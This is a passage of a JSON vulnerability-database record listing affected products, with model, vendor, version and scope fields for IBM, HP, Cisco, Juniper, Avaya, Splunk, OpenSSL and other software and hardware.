"1.3.0.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "flex system interconnect fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.80" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.30" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10g vfsm for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power 795", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.51" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571430" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73210" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.21" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "1:10g switch for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.10.0" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power system s822l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571450" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504667" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.10" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205587" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "project openssl 0.9.8zd", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63800" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.60" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "ctpview 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos controller interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.41" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bladecenter js22", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-61x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.20" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.32" }, { "model": "1:10g switch for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.15" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079460" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079440" }, { "model": "bladecenter js23", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mint", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571920" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079470" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056330" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571490" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "1:10g switch for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.80" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "bladecenter js43 with feature code", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x8446)0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.51" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "power system s824", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ctp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7500" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "power systems e880", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ctpos 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.10" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734-" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.61" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.20" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.90" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.02" }, { "model": "bladecenter js12 express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-60x)0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "enterprise", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.20" }, { "model": "cognos controller if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "flex system p24l compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.4" }, { "model": "power system s812l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, 